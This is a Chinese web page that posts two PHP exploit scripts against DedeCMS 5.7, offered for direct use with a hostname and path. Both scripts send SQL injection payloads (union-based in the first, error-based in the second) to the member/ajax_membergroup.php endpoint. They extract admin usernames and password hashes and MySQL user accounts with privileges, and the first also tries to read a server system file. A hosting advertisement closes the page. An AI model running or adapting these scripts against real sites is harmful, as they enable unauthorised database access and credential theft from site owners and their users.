最新兩個DEDECMS5.7漏洞EXP

<?php
ini_set("max_execution_time",0);
error_reporting(7);
ob_implicit_flush(true);
function usage()
{
global $argv;
exit(
" --+++============================================================+++--".
" --+++=================== DeDe 5.7 sql Exploit ==================+++--".
" --+++============================================================+++--".
" [+] Author : CunZhang".
" [+] Time : 2012-4-10".
" [+] Blog : http://www.sysmjj.com".
" [+] Usage : php ".$argv[0]." <hostname> <path>".
" [+] Exp : php ".$argv[0]." localhost /".

" ");
}

function query($biao,$chr,$chs)
{
global $pre;
switch ($chs){
case 1:
$query = "@`'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `".$pre."admin` where 1 or id=@`'`";
break;
case 2:
$query = "@`'` Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` limit $chr,1 Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` where 1=2 or id=@`'`";
break;
case 3:
$query = "'";
break;
case 4:
$query = "@`'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `mysql`.user where 1 or user=@`'`";
break;
case 5:
$query = "@`'` Union select concat(0x7e,0x27,Host,0x7C,User,0x7C,Password,0x7C,Select_priv,0x27,0x7e) from `mysql`.user limit $chr,1 Union select 1 from `".$pre."admin` where 1=2 or id=@`'`";
break;
case 6:
$query = "@`'` Union select concat(0x7e,0x27,Load_file(0x633A5C626F6F742E696E69),0x27,0x7e) from `mysql`.user where 1 or user=@`'`";
break;
}
//echo $query." ";
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path,$biao, $chr, $chs)
{
$conn = fsockopen($hostname, 80);
if (!$conn){
exit(" [-] No response from $conn ");
}

$postdata = "action=post&membergroup=".query($biao,$chr,$chs);
$message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1 ";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ";
$message .= "Host: $hostname ";
$message .= "Content-Length: ".strlen($postdata)." ";
$message .= "Cookie: $sessions ";
$message .= "Connection: Close ";
$message .= $postdata;
//echo $message ;
$inheader = 1;
fputs($conn, $message);
while (!feof($conn))
$reply .= fread($conn, 1024);
fclose($conn);
//print $reply;


$reply=substr($reply,strpos($reply," "));
//echo $reply;
//echo iconv('UTF-8', 'GB2312', $reply);
return $reply;
}


function GetPre($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,3);
//echo $response;
if (preg_match("/FROM (.*?)member_group/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "dede_";
}
}

function dbcounts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,4);
//echo $response;
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function counts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,1);
//echo $response;
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetDBUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,5);
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,2);
if (preg_match("/~'(.*?)'~/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] ======================================================= ";
echo "[+] Pre: ";
ob_flush();
flush();
$pre=GetPre($hostname, $path);
echo $pre." ";
echo "[+] DbCount: ";
ob_flush();
flush();
$dbcount=dbcounts($hostname, $path);
echo $dbcount." ";
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$dbcount){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$dbuser=GetDBUser($hostname,$path,$c);
echo $dbuser." ";
$c++;
}
///////////////////////////////////////////////////////////////////
echo "[+] Admin@Count: ";
ob_flush();
flush();
$count=counts($hostname, $path);
echo $count." ";
ob_flush();
flush();
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$count){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$user=GetUser($hostname,$path,$c);
echo $user." ";
$c++;
}
///////////////////////////////////////////////////////////////////
?>

5.71.php：

<?php
ini_set("max_execution_time",0);
error_reporting(7);
ob_implicit_flush(true);
function usage()
{
global $argv;
exit(
" --+++============================================================+++--".
" --+++=================== DeDe 5.7 sql Exploit ==================+++--".
" --+++============================================================+++--".
" [+] Author : CunZhang".
" [+] Time : 2012-4-10".
" [+] Blog : http://www.sysmjj.com".
" [+] Usage : php ".$argv[0]." <hostname> <path>".
" [+] Exp : php ".$argv[0]." localhost /".

" ");
}

function query($biao,$chr,$chs)
{
global $pre;
switch ($chs){
case 1:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,count(*),0x5d) from ".$pre."admin))a from information_schema.tables group by a)b)";
break;
case 2:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,userid,0x3a,pwd,0x5d) from ".$pre."admin Limit ".$chr.",1))a from information_schema.tables group by a)b)";
break;
case 3:
$query = "'";
break;
case 4:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,count(*),0x5d) from mysql.user))a from information_schema.tables group by a)b)";
break;
case 5:
$query = "`a'` and(SELECT/*''*/1 FROM(select/*''*/count(*),concat(floor(rand(0)*2),(SELECT/*''*/concat(0x5b,Host,0x7C,User,0x7C,Password,0x7C,File_priv,0x5d) from mysql.user Limit ".$chr.",1))a from information_schema.tables group by a)b)";
break;
}
//echo $query." ";
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path,$biao, $chr, $chs)
{
$conn = fsockopen($hostname, 80);
if (!$conn){
exit(" [-] No response from $conn ");
}

$postdata = "action=post&membergroup=".query($biao,$chr,$chs);
$message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1 ";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ";
$message .= "Host: $hostname ";
$message .= "Content-Length: ".strlen($postdata)." ";
$message .= "Cookie: $sessions ";
$message .= "Connection: Close ";
$message .= $postdata;
//echo $message ;
$inheader = 1;
fputs($conn, $message);
while (!feof($conn))
$reply .= fread($conn, 1024);
fclose($conn);
//print $reply;


$reply=substr($reply,strpos($reply," "));
//echo $reply;
//echo iconv('UTF-8', 'GB2312', $reply);
return $reply;
}


function GetPre($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,3);
//echo $response;
if (preg_match("/FROM (.*?)member_group/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "dede_";
}
}

function dbcounts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,4);
//echo $response;
if (preg_match("/[(.*?)]/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function counts($hostname,$path)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,1,1);
//echo $response;
if (preg_match("/[(.*?)]/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetDBUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,5);
if (preg_match("/'d(.*?)'/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

function GetUser($hostname,$path,$c)
{
$tmp = array();
$exit = 0;
while ($exit==0)
{
$response = exploit($hostname, $path,1,$c-1,2);
if (preg_match("/'d(.*?)'/i",$response,$tmp))
{
$exit = 1;
return $tmp[1];
}
else
return "Can't Get ";
}
}

///////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] ======================================================= ";
echo "[+] Pre: ";
ob_flush();
flush();
$pre=GetPre($hostname, $path);
echo $pre." ";
echo "[+] DbCount: ";
ob_flush();
flush();
$dbcount=dbcounts($hostname, $path);
echo $dbcount." ";
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$dbcount){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$dbuser=GetDBUser($hostname,$path,$c);
echo $dbuser." ";
$c++;
}
///////////////////////////////////////////////////////////////////
echo "[+] Admin@Count: ";
ob_flush();
flush();
$count=counts($hostname, $path);
echo $count." ";
ob_flush();
flush();
///////////////////////////////////////////////////////////////////
$c=1;
///////////////////////////////////////////////////////////////////
while($c<=$count){
echo "[+] <".($c)."> ";
ob_flush();
flush();
$user=GetUser($hostname,$path,$c);
echo $user." ";
$c++;
}
///////////////////////////////////////////////////////////////////
?>

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]